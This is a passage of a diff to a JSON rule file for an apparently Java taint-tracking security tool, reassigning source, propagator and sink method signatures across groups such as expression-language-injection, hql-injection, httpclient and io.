"org.hibernate.criterion.Restrictions.sqlRestriction(java.lang.String)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "all", + "inherit": "true", "source": "P1", "stack_blacklist": [], "tags": [], "target": "", "track": "true", "untags": [], - "value": "jakarta.el.ELProcessor.getValue(java.lang.String,java.lang.Class)" + "value": "org.hibernate.criterion.Restrictions.sqlRestriction(java.lang.String,java.lang.Object,org.hibernate.type.Type)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "all", + "inherit": "true", "source": "P1", "stack_blacklist": [], "tags": [], "target": "", "track": "true", "untags": [], - "value": "jakarta.el.ELProcessor.setValue(java.lang.String,java.lang.Object)" + "value": "org.hibernate.criterion.Restrictions.sqlRestriction(java.lang.String,java.lang.Object[],org.hibernate.type.Type[])" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "all", - "source": "P2", + "inherit": "true", + "source": "P1", "stack_blacklist": [], "tags": [], "target": "", "track": "true", "untags": [], - "value": "jakarta.el.ELProcessor.setVariable(java.lang.String,java.lang.String)" + "value": "org.hibernate.query.QueryProducer.createNativeQuery(java.lang.String)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "all", - "source": "P2", + "inherit": "true", + "source": "P1", "stack_blacklist": [], "tags": [], "target": "", "track": "true", "untags": [], - "value": "jakarta.el.ExpressionFactory.createMethodExpression(jakarta.el.ELContext,java.lang.String,java.lang.Class,java.lang.Class[])" + "value": "org.hibernate.query.QueryProducer.createNativeQuery(java.lang.String,java.lang.Class)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "all", - "source": "P2", + "inherit": "true", + "source": "P1", "stack_blacklist": [], "tags": [], "target": "", "track": "true", "untags": [], - "value": "jakarta.el.ExpressionFactory.createValueExpression(jakarta.el.ELContext,java.lang.String,java.lang.Class)" - }, + "value": "org.hibernate.query.QueryProducer.createNativeQuery(java.lang.String,java.lang.String)" + } + ], + "enable": 1, + "type": 4, + "value": "hql-injection" + }, + { + "details": [ { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "all", + "inherit": "false", "source": "P1", "stack_blacklist": [], "tags": [], - "target": "", - "track": "true", + "target": "O", + "track": "false", "untags": [], - "value": "jakarta.servlet.jsp.el.ExpressionEvaluator.evaluate(java.lang.String,java.lang.Class,jakarta.servlet.jsp.el.VariableResolver,jakarta.servlet.jsp.el.FunctionMapper)" + "value": "org.apache.http.entity.ByteArrayEntity.(byte[],int,int,org.apache.http.entity.ContentType)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "all", + "inherit": "false", "source": "P1", "stack_blacklist": [], "tags": [], - "target": "", - "track": "true", + "target": "O", + "track": "false", "untags": [], - "value": "javax.el.ELProcessor.eval(java.lang.String)" + "value": "org.apache.http.entity.ByteArrayEntity.(byte[],org.apache.http.entity.ContentType)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "all", + "inherit": "false", "source": "P1", "stack_blacklist": [], "tags": [], - "target": "", - "track": "true", + "target": "O", + "track": "false", "untags": [], - "value": "javax.el.ELProcessor.getValue(java.lang.String,java.lang.Class)" + "value": "org.apache.http.entity.InputStreamEntity.(java.io.InputStream,long,org.apache.http.entity.ContentType)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "all", + "inherit": "false", "source": "P1", "stack_blacklist": [], "tags": [], - "target": "", - "track": "true", + "target": "O", + "track": "false", "untags": [], - "value": "javax.el.ELProcessor.setValue(java.lang.String,java.lang.Object)" + "value": "org.apache.http.entity.StringEntity.(java.lang.String,java.lang.String,java.lang.String)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "all", - "source": "P2", + "inherit": "false", + "source": "P1", "stack_blacklist": [], "tags": [], - "target": "", - "track": "true", + "target": "O", + "track": "false", "untags": [], - "value": "javax.el.ELProcessor.setVariable(java.lang.String,java.lang.String)" - }, + "value": "org.apache.http.entity.StringEntity.(java.lang.String,org.apache.http.entity.ContentType)" + } + ], + "enable": 1, + "type": 1, + "value": "httpclient" + }, + { + "details": [ { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "all", - "source": "P2", + "inherit": "false", + "source": "P1", "stack_blacklist": [], "tags": [], - "target": "", - "track": "true", + "target": "O", + "track": "false", "untags": [], - "value": "javax.el.ExpressionFactory.createMethodExpression(javax.el.ELContext,java.lang.String,java.lang.Class,java.lang.Class[])" + "value": "org.apache.hc.core5.http.io.entity.ByteArrayEntity.(byte[],int,int,org.apache.hc.core5.http.ContentType,java.lang.String,boolean)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "all", - "source": "P2", + "inherit": "false", + "source": "P1", "stack_blacklist": [], "tags": [], - "target": "", - "track": "true", + "target": "O", + "track": "false", "untags": [], - "value": "javax.el.ExpressionFactory.createValueExpression(javax.el.ELContext,java.lang.String,java.lang.Class)" + "value": "org.apache.hc.core5.http.io.entity.ByteArrayEntity.(byte[],org.apache.hc.core5.http.ContentType,java.lang.String,boolean)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "all", + "inherit": "false", "source": "P1", "stack_blacklist": [], "tags": [], - "target": "", - "track": "true", + "target": "O", + "track": "false", "untags": [], - "value": "javax.servlet.jsp.el.ExpressionEvaluator.evaluate(java.lang.String,java.lang.Class,javax.servlet.jsp.el.VariableResolver,javax.servlet.jsp.el.FunctionMapper)" + "value": "org.apache.hc.core5.http.io.entity.InputStreamEntity.(java.io.InputStream,long,org.apache.hc.core5.http.ContentType,java.lang.String)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "all", + "inherit": "false", "source": "P1", "stack_blacklist": [], "tags": [], - "target": "", - "track": "true", + "target": "O", + "track": "false", "untags": [], - "value": "ognl.Ognl.getValue(java.lang.Object,java.lang.Object)" - }, + "value": "org.apache.hc.core5.http.io.entity.StringEntity.(java.lang.String,org.apache.hc.core5.http.ContentType,java.lang.String,boolean)" + } + ], + "enable": 1, + "type": 1, + "value": "httpclient5" + }, + { + "details": [ { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "all", + "inherit": "false", "source": "P1", "stack_blacklist": [], "tags": [], - "target": "", - "track": "true", + "target": "O", + "track": "", "untags": [], - "value": "ognl.Ognl.getValue(java.lang.Object,java.lang.Object,java.lang.Class)" + "value": "java.io.BufferedReader.(java.io.InputStreamReader)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "all", + "inherit": "false", "source": "P1", "stack_blacklist": [], "tags": [], - "target": "", - "track": "true", + "target": "O", + "track": "", "untags": [], - "value": "ognl.Ognl.getValue(java.lang.Object,java.util.Map,java.lang.Object)" + "value": "java.io.BufferedReader.(java.io.Reader)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "all", + "inherit": "false", "source": "P1", "stack_blacklist": [], "tags": [], - "target": "", - "track": "true", + "target": "O", + "track": "", "untags": [], - "value": "ognl.Ognl.getValue(java.lang.Object,java.util.Map,java.lang.Object,java.lang.Class)" + "value": "java.io.BufferedReader.(java.io.Reader,int)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "all", - "source": "P1", + "inherit": "false", + "source": "O", "stack_blacklist": [], "tags": [], - "target": "", - "track": "true", + "target": "R", + "track": "", "untags": [], - "value": "ognl.Ognl.getValue(java.lang.String,java.lang.Object)" + "value": "java.io.BufferedReader.readLine()" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "all", + "inherit": "false", "source": "P1", "stack_blacklist": [], "tags": [], - "target": "", - "track": "true", + "target": "O", + "track": "", "untags": [], - "value": "ognl.Ognl.getValue(java.lang.String,java.lang.Object,java.lang.Class)" + "value": "java.io.ByteArrayInputStream.(byte[])" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "all", + "inherit": "false", "source": "P1", "stack_blacklist": [], "tags": [], - "target": "", - "track": "true", + "target": "O", + "track": "", "untags": [], - "value": "ognl.Ognl.getValue(java.lang.String,java.util.Map,java.lang.Object)" + "value": "java.io.ByteArrayInputStream.(byte[],int,int)" }, { - "command": "", + "command": "REMOVE()", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "all", - "source": "P1", + "inherit": "false", + "source": "O", "stack_blacklist": [], "tags": [], - "target": "", - "track": "true", + "target": "O", + "track": "", "untags": [], - "value": "ognl.Ognl.getValue(java.lang.String,java.util.Map,java.lang.Object,java.lang.Class)" + "value": "java.io.ByteArrayOutputStream.reset()" }, { - "command": "", + "command": "KEEP()", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "all", - "source": "P1", + "inherit": "false", + "source": "O", "stack_blacklist": [], "tags": [], - "target": "", - "track": "true", + "target": "R", + "track": "false", "untags": [], - "value": "ognl.Ognl.parseExpression(java.lang.String)" + "value": "java.io.ByteArrayOutputStream.toByteArray()" }, { - "command": "", + "command": "KEEP()", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "all", - "source": "P1", + "inherit": "false", + "source": "O", "stack_blacklist": [], "tags": [], - "target": "", - "track": "true", + "target": "R", + "track": "false", "untags": [], - "value": "org.apache.commons.ognl.Ognl.parseExpression(java.lang.String)" + "value": "java.io.ByteArrayOutputStream.toString()" }, { - "command": "", + "command": "KEEP()", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "true", + "inherit": "false", "source": "O", "stack_blacklist": [], "tags": [], - "target": "", - "track": "true", + "target": "R", + "track": "false", "untags": [], - "value": "org.springframework.expression.Expression.getValue()" + "value": "java.io.ByteArrayOutputStream.toString(int)" }, { - "command": "", + "command": "KEEP()", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "true", + "inherit": "false", "source": "O", "stack_blacklist": [], "tags": [], - "target": "", - "track": "true", + "target": "R", + "track": "false", "untags": [], - "value": "org.springframework.expression.Expression.getValue(java.lang.Class)" + "value": "java.io.ByteArrayOutputStream.toString(java.lang.String)" }, { - "command": "", + "command": "KEEP()", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "true", + "inherit": "false", "source": "O", "stack_blacklist": [], "tags": [], - "target": "", - "track": "true", + "target": "R", + "track": "false", "untags": [], - "value": "org.springframework.expression.Expression.getValue(java.lang.Object)" + "value": "java.io.ByteArrayOutputStream.toString(java.nio.charset.Charset)" }, { - "command": "", + "command": "APPEND(P2,P3)", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "true", - "source": "O", + "inherit": "false", + "source": "P1", "stack_blacklist": [], "tags": [], - "target": "", - "track": "true", + "target": "O", + "track": "", "untags": [], - "value": "org.springframework.expression.Expression.getValue(java.lang.Object,java.lang.Class)" + "value": "java.io.ByteArrayOutputStream.write(byte[],int,int)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "true", - "source": "O", + "inherit": "false", + "source": "P1", "stack_blacklist": [], "tags": [], - "target": "", - "track": "true", + "target": "O", + "track": "", "untags": [], - "value": "org.springframework.expression.Expression.getValue(org.springframework.expression.EvaluationContext)" + "value": "java.io.CharArrayReader.(char[])" }, { - "command": "", + "command": "INSERT(0,P2,P3)", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "true", - "source": "O", + "inherit": "false", + "source": "P1", "stack_blacklist": [], "tags": [], - "target": "", - "track": "true", + "target": "O", + "track": "", "untags": [], - "value": "org.springframework.expression.Expression.getValue(org.springframework.expression.EvaluationContext,java.lang.Class)" + "value": "java.io.CharArrayReader.(char[],int,int)" }, { - "command": "", + "command": "INSERT(0,P2,P3)", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "true", + "inherit": "false", "source": "O", "stack_blacklist": [], "tags": [], - "target": "", - "track": "true", + "target": "P1", + "track": "", "untags": [], - "value": "org.springframework.expression.Expression.getValue(org.springframework.expression.EvaluationContext,java.lang.Object)" + "value": "java.io.CharArrayReader.read(char[],int,int)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "true", - "source": "O", + "inherit": "false", + "source": "P1", "stack_blacklist": [], "tags": [], - "target": "", - "track": "true", + "target": "O", + "track": "", "untags": [], - "value": "org.springframework.expression.Expression.getValue(org.springframework.expression.EvaluationContext,java.lang.Object,java.lang.Class)" + "value": "java.io.FileReader.(java.io.File)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "true", - "source": "O", + "inherit": "false", + "source": "P1", "stack_blacklist": [], "tags": [], - "target": "", - "track": "true", + "target": "O", + "track": "", "untags": [], - "value": "org.springframework.expression.Expression.getValueTypeDescriptor()" + "value": "java.io.InputStream.(java.io.InputStream)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "true", + "inherit": "false", "source": "O", "stack_blacklist": [], "tags": [], - "target": "", - "track": "true", + "target": "P1", + "track": "false", "untags": [], - "value": "org.springframework.expression.Expression.getValueTypeDescriptor(java.lang.Object)" + "value": "java.io.InputStream.read(byte[])" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "true", + "inherit": "false", "source": "O", "stack_blacklist": [], "tags": [], - "target": "", - "track": "true", + "target": "P1", + "track": "", "untags": [], - "value": "org.springframework.expression.Expression.getValueTypeDescriptor(org.springframework.expression.EvaluationContext)" + "value": "java.io.InputStream.read(byte[],int,int)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "true", + "inherit": "false", "source": "O", "stack_blacklist": [], "tags": [], - "target": "", - "track": "true", + "target": "P1", + "track": "false", "untags": [], - "value": "org.springframework.expression.Expression.getValueTypeDescriptor(org.springframework.expression.EvaluationContext,java.lang.Object)" + "value": "java.io.InputStream.transferTo(java.io.OutputStream)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "all", + "inherit": "false", "source": "P1", "stack_blacklist": [], "tags": [], - "target": "", - "track": "true", + "target": "O", + "track": "", "untags": [], - "value": "org.thymeleaf.standard.expression.Expression.parse(java.lang.String)" + "value": "java.io.InputStreamReader.(java.io.InputStream)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "true", - "source": "P2", - "stack_blacklist": [], - "tags": [], - "target": "", - "track": "true", - "untags": [], - "value": "org.thymeleaf.standard.expression.IStandardExpressionParser.parseExpression(org.thymeleaf.context.IExpressionContext,java.lang.String)" - } - ], - "enable": 1, - "type": 4, - "value": "expression-language-injection" - }, - { - "details": [ - { - "command": "", - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "true", - "source": "O", + "inherit": "false", + "source": "P1", "stack_blacklist": [], "tags": [], - "target": "R", + "target": "O", "track": "false", "untags": [], - "value": "org.apache.commons.fileupload.FileItem.getName()" + "value": "java.io.InputStreamReader.(java.io.InputStream,java.lang.String)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "true", - "source": "O", + "inherit": "false", + "source": "P1", "stack_blacklist": [], "tags": [], - "target": "R", - "track": "false", + "target": "O", + "track": "", "untags": [], - "value": "org.springframework.web.multipart.MultipartFile.getName()" + "value": "java.io.InputStreamReader.(java.io.InputStream,java.nio.charset.Charset)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "true", + "inherit": "false", "source": "O", "stack_blacklist": [], "tags": [], - "target": "R", - "track": "false", + "target": "P1", + "track": "", "untags": [], - "value": "org.springframework.web.multipart.MultipartFile.getOriginalFilename()" - } - ], - "enable": 1, - "type": 1, - "value": "fileupload" - }, - { - "details": [ + "value": "java.io.InputStreamReader.read(char[],int,int)" + }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "true", - "source": "P2", + "inherit": "all", + "source": "P1", "stack_blacklist": [], "tags": [], - "target": "", - "track": "true", + "target": "O", + "track": "", "untags": [], - "value": "org.hibernate.Session.createFilter(java.lang.Object,java.lang.String)" + "value": "java.io.ObjectInputStream.(java.io.InputStream)" }, { - "command": "", + "command": "INSERT(0,P2,P3)", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "true", + "inherit": "false", "source": "P1", "stack_blacklist": [], "tags": [], - "target": "", - "track": "true", + "target": "O", + "track": "false", "untags": [], - "value": "org.hibernate.Session.createQuery(java.lang.String)" + "value": "java.io.PipedInputStream.read(byte[],int,int)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "true", + "inherit": "false", "source": "P1", "stack_blacklist": [], "tags": [], - "target": "", - "track": "true", + "target": "O", + "track": "false", "untags": [], - "value": "org.hibernate.Session.createSQLQuery(java.lang.String)" + "value": "java.io.PipedInputStream.receive(byte[],int,int)" }, { - "command": "", + "command": "INSERT(0,P2,P3)", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "true", + "inherit": "false", "source": "P1", "stack_blacklist": [], "tags": [], - "target": "", - "track": "true", + "target": "O", + "track": "false", "untags": [], - "value": "org.hibernate.Session.createSQLQuery(java.lang.String,java.lang.String,java.lang.Class)" + "value": "java.io.PipedReader.read(char[],int,int)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "true", + "inherit": "false", "source": "P1", "stack_blacklist": [], "tags": [], - "target": "", - "track": "true", + "target": "O", + "track": "false", "untags": [], - "value": "org.hibernate.Session.createSQLQuery(java.lang.String,java.lang.String[],java.lang.Class[])" + "value": "java.io.PipedReader.receive(char[],int,int)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "true", + "inherit": "false", "source": "P1", "stack_blacklist": [], "tags": [], - "target": "", - "track": "true", + "target": "O", + "track": "", "untags": [], - "value": "org.hibernate.Session.delete(java.lang.String)" + "value": "java.io.PushbackInputStream.(java.io.InputStream,int)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "true", - "source": "P1", + "inherit": "false", + "source": "O", "stack_blacklist": [], "tags": [], - "target": "", - "track": "true", + "target": "P1", + "track": "false", "untags": [], - "value": "org.hibernate.Session.delete(java.lang.String,java.lang.Object,org.hibernate.type.Type)" + "value": "java.io.PushbackInputStream.read(byte[],int,int)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "true", - "source": "P1", + "inherit": "all", + "source": "O", "stack_blacklist": [], "tags": [], - "target": "", - "track": "true", + "target": "P1", + "track": "false", "untags": [], - "value": "org.hibernate.Session.delete(java.lang.String,java.lang.Object[],org.hibernate.type.Type[])" + "value": "java.io.Reader.read(char[])" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "true", - "source": "P2", + "inherit": "all", + "source": "O", "stack_blacklist": [], "tags": [], - "target": "", - "track": "true", + "target": "P1", + "track": "false", "untags": [], - "value": "org.hibernate.Session.filter(java.lang.Object,java.lang.String)" + "value": "java.io.Reader.transferTo(java.io.Writer)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "true", - "source": "P2", + "inherit": "false", + "source": "P1", "stack_blacklist": [], "tags": [], - "target": "", - "track": "true", + "target": "O", + "track": "", "untags": [], - "value": "org.hibernate.Session.filter(java.lang.Object,java.lang.String,java.lang.Object,org.hibernate.type.Type)" + "value": "java.io.StringReader.(java.lang.String)" }, { - "command": "", + "command": "KEEP()", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "true", - "source": "P2", + "inherit": "false", + "source": "O", "stack_blacklist": [], "tags": [], - "target": "", - "track": "true", + "target": "R", + "track": "false", "untags": [], - "value": "org.hibernate.Session.filter(java.lang.Object,java.lang.String,java.lang.Object[],org.hibernate.type.Type[])" + "value": "java.io.StringWriter.toString()" }, { - "command": "", + "command": "APPEND(P2,P3)", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "true", + "inherit": "false", "source": "P1", "stack_blacklist": [], "tags": [], - "target": "", - "track": "true", + "target": "O", + "track": "false", "untags": [], - "value": "org.hibernate.Session.find(java.lang.String)" + "value": "java.io.StringWriter.write(char[],int,int)" }, { - "command": "", + "command": "APPEND()", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "true", + "inherit": "false", "source": "P1", "stack_blacklist": [], "tags": [], - "target": "", - "track": "true", + "target": "O", + "track": "false", "untags": [], - "value": "org.hibernate.Session.find(java.lang.String,java.lang.Object,org.hibernate.type.Type)" + "value": "java.io.StringWriter.write(java.lang.String)" }, { - "command": "", + "command": "APPEND(P2,P3)", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "true", + "inherit": "false", "source": "P1", "stack_blacklist": [], "tags": [], - "target": "", - "track": "true", + "target": "O", + "track": "false", "untags": [], - "value": "org.hibernate.Session.find(java.lang.String,java.lang.Object[],org.hibernate.type.Type[])" + "value": "java.io.StringWriter.write(java.lang.String,int,int)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "true", + "inherit": "false", "source": "P1", "stack_blacklist": [], "tags": [], - "target": "", - "track": "true", + "target": "O", + "track": "", "untags": [], - "value": "org.hibernate.Session.iterate(java.lang.String)" + "value": "java.net.Socket.(java.lang.String,int)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "true", - "source": "P1", + "inherit": "false", + "source": "O", "stack_blacklist": [], "tags": [], - "target": "", - "track": "true", + "target": "R", + "track": "", "untags": [], - "value": "org.hibernate.Session.iterate(java.lang.String,java.lang.Object,org.hibernate.type.Type)" + "value": "java.net.Socket.getOutputStream()" }, { - "command": "", + "command": "REMOVE()", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "true", - "source": "P1", + "inherit": "false", + "source": "O", "stack_blacklist": [], "tags": [], - "target": "", - "track": "true", + "target": "O", + "track": "false", "untags": [], - "value": "org.hibernate.Session.iterate(java.lang.String,java.lang.Object[],org.hibernate.type.Type[])" + "value": "org.apache.commons.io.output.ByteArrayOutputStream.reset()" }, { - "command": "", + "command": "APPEND(P2,P3)", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "true", + "inherit": "false", "source": "P1", "stack_blacklist": [], "tags": [], - "target": "", - "track": "true", + "target": "O", + "track": "false", "untags": [], - "value": "org.hibernate.SharedSessionContract.createQuery(java.lang.String)" - }, + "value": "org.apache.commons.io.output.ByteArrayOutputStream.write(byte[],int,int)" + } + ], + "enable": 1, + "type": 1, + "value": "io" + }, + { + "details": [ { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "true", - "source": "P1", + "inherit": "false", + "source": "O", "stack_blacklist": [], "tags": [], - "target": "", - "track": "true", + "target": "R", + "track": "", "untags": [], - "value": "org.hibernate.SharedSessionContract.createSQLQuery(java.lang.String)" + "value": "javax.xml.bind.JAXBElement.getValue()" }, { "command": "", @@ -5942,10 +5838,10 @@ "source": "P1", "stack_blacklist": [], "tags": [], - "target": "", - "track": "true", + "target": "R", + "track": "", "untags": [], - "value": "org.hibernate.criterion.Expression.sql(java.lang.String)" + "value": "javax.xml.stream.XMLInputFactory.createXMLStreamReader(java.io.InputStream)" }, { "command": "", @@ -5955,36 +5851,36 @@ "source": "P1", "stack_blacklist": [], "tags": [], - "target": "", - "track": "true", + "target": "R", + "track": "", "untags": [], - "value": "org.hibernate.criterion.Expression.sql(java.lang.String,java.lang.Object[],org.hibernate.type.Type[])" + "value": "javax.xml.stream.XMLInputFactory.createXMLStreamReader(java.io.InputStream,java.lang.String)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, "inherit": "true", - "source": "P1", + "source": "P2", "stack_blacklist": [], "tags": [], - "target": "", - "track": "true", + "target": "R", + "track": "", "untags": [], - "value": "org.hibernate.criterion.Restrictions.sqlRestriction(java.lang.String)" + "value": "javax.xml.stream.XMLInputFactory.createXMLStreamReader(java.lang.String,java.io.InputStream)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, "inherit": "true", - "source": "P1", + "source": "P2", "stack_blacklist": [], "tags": [], - "target": "", - "track": "true", + "target": "R", + "track": "", "untags": [], - "value": "org.hibernate.criterion.Restrictions.sqlRestriction(java.lang.String,java.lang.Object,org.hibernate.type.Type)" + "value": "javax.xml.stream.XMLInputFactory.createXMLStreamReader(java.lang.String,java.io.Reader)" }, { "command": "", @@ -5994,57 +5890,50 @@ "source": "P1", "stack_blacklist": [], "tags": [], - "target": "", - "track": "true", + "target": "R", + "track": "", "untags": [], - "value": "org.hibernate.criterion.Restrictions.sqlRestriction(java.lang.String,java.lang.Object[],org.hibernate.type.Type[])" + "value": "javax.xml.stream.XMLInputFactory.createXMLStreamReader(javax.xml.transform.Source)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "true", + "inherit": "false", "source": "P1", "stack_blacklist": [], "tags": [], - "target": "", - "track": "true", + "target": "O", + "track": "", "untags": [], - "value": "org.hibernate.query.QueryProducer.createNativeQuery(java.lang.String)" + "value": "javax.xml.transform.sax.SAXSource.(org.xml.sax.InputSource)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "true", - "source": "P1", + "inherit": "false", + "source": "P2", "stack_blacklist": [], "tags": [], - "target": "", - "track": "true", + "target": "O", + "track": "", "untags": [], - "value": "org.hibernate.query.QueryProducer.createNativeQuery(java.lang.String,java.lang.Class)" + "value": "javax.xml.transform.sax.SAXSource.(org.xml.sax.XMLReader,org.xml.sax.InputSource)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "true", + "inherit": "false", "source": "P1", "stack_blacklist": [], "tags": [], - "target": "", - "track": "true", + "target": "O", + "track": "", "untags": [], - "value": "org.hibernate.query.QueryProducer.createNativeQuery(java.lang.String,java.lang.String)" - } - ], - "enable": 1, - "type": 4, - "value": "hql-injection" - }, - { - "details": [ + "value": "javax.xml.transform.sax.SAXSource.setInputSource(org.xml.sax.InputSource)" + }, { "command": "", "ignore_blacklist": false, @@ -6054,9 +5943,9 @@ "stack_blacklist": [], "tags": [], "target": "O", - "track": "false", + "track": "", "untags": [], - "value": "org.apache.http.entity.ByteArrayEntity.(byte[],int,int,org.apache.http.entity.ContentType)" + "value": "javax.xml.transform.stream.StreamSource.(java.io.File)" }, { "command": "", @@ -6067,9 +5956,9 @@ "stack_blacklist": [], "tags": [], "target": "O", - "track": "false", + "track": "", "untags": [], - "value": "org.apache.http.entity.ByteArrayEntity.(byte[],org.apache.http.entity.ContentType)" + "value": "javax.xml.transform.stream.StreamSource.(java.io.InputStream)" }, { "command": "", @@ -6080,9 +5969,9 @@ "stack_blacklist": [], "tags": [], "target": "O", - "track": "false", + "track": "", "untags": [], - "value": "org.apache.http.entity.InputStreamEntity.(java.io.InputStream,long,org.apache.http.entity.ContentType)" + "value": "javax.xml.transform.stream.StreamSource.(java.io.InputStream,java.lang.String)" }, { "command": "", @@ -6093,9 +5982,9 @@ "stack_blacklist": [], "tags": [], "target": "O", - "track": "false", + "track": "", "untags": [], - "value": "org.apache.http.entity.StringEntity.(java.lang.String,java.lang.String,java.lang.String)" + "value": "javax.xml.transform.stream.StreamSource.(java.io.Reader)" }, { "command": "", @@ -6106,14 +5995,14 @@ "stack_blacklist": [], "tags": [], "target": "O", - "track": "false", + "track": "", "untags": [], - "value": "org.apache.http.entity.StringEntity.(java.lang.String,org.apache.http.entity.ContentType)" + "value": "javax.xml.transform.stream.StreamSource.(java.io.Reader,java.lang.String)" } ], "enable": 1, "type": 1, - "value": "httpclient" + "value": "javax" }, { "details": [ @@ -6121,624 +6010,670 @@ "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", - "source": "P1", + "inherit": "true", + "source": "O", "stack_blacklist": [], - "tags": [], - "target": "O", + "tags": [ + "cross-site" + ], + "target": "R", "track": "false", "untags": [], - "value": "org.apache.hc.core5.http.io.entity.ByteArrayEntity.(byte[],int,int,org.apache.hc.core5.http.ContentType,java.lang.String,boolean)" + "value": "jakarta.servlet.ServletRequest.getInputStream()" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", + "inherit": "true", "source": "P1", "stack_blacklist": [], - "tags": [], - "target": "O", + "tags": [ + "cross-site" + ], + "target": "R", "track": "false", "untags": [], - "value": "org.apache.hc.core5.http.io.entity.ByteArrayEntity.(byte[],org.apache.hc.core5.http.ContentType,java.lang.String,boolean)" + "value": "jakarta.servlet.ServletRequest.getParameter(java.lang.String)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", - "source": "P1", + "inherit": "true", + "source": "O", "stack_blacklist": [], - "tags": [], - "target": "O", + "tags": [ + "cross-site" + ], + "target": "R", "track": "false", "untags": [], - "value": "org.apache.hc.core5.http.io.entity.InputStreamEntity.(java.io.InputStream,long,org.apache.hc.core5.http.ContentType,java.lang.String)" + "value": "jakarta.servlet.ServletRequest.getParameterNames()" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", + "inherit": "true", "source": "P1", "stack_blacklist": [], - "tags": [], - "target": "O", + "tags": [ + "cross-site" + ], + "target": "R", "track": "false", "untags": [], - "value": "org.apache.hc.core5.http.io.entity.StringEntity.(java.lang.String,org.apache.hc.core5.http.ContentType,java.lang.String,boolean)" - } - ], - "enable": 1, - "type": 1, - "value": "httpclient5" - }, - { - "details": [ + "value": "jakarta.servlet.ServletRequest.getParameterValues(java.lang.String)" + }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", - "source": "P1", + "inherit": "true", + "source": "O", "stack_blacklist": [], - "tags": [], - "target": "O", - "track": "", + "tags": [ + "cross-site" + ], + "target": "R", + "track": "false", "untags": [], - "value": "java.io.BufferedReader.(java.io.InputStreamReader)" + "value": "jakarta.servlet.ServletRequest.getReader()" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", - "source": "P1", + "inherit": "true", + "source": "O", "stack_blacklist": [], - "tags": [], - "target": "O", - "track": "", + "tags": [ + "cross-site" + ], + "target": "R", + "track": "false", "untags": [], - "value": "java.io.BufferedReader.(java.io.Reader)" + "value": "javax.servlet.ServletRequest.getInputStream()" }, { "command": 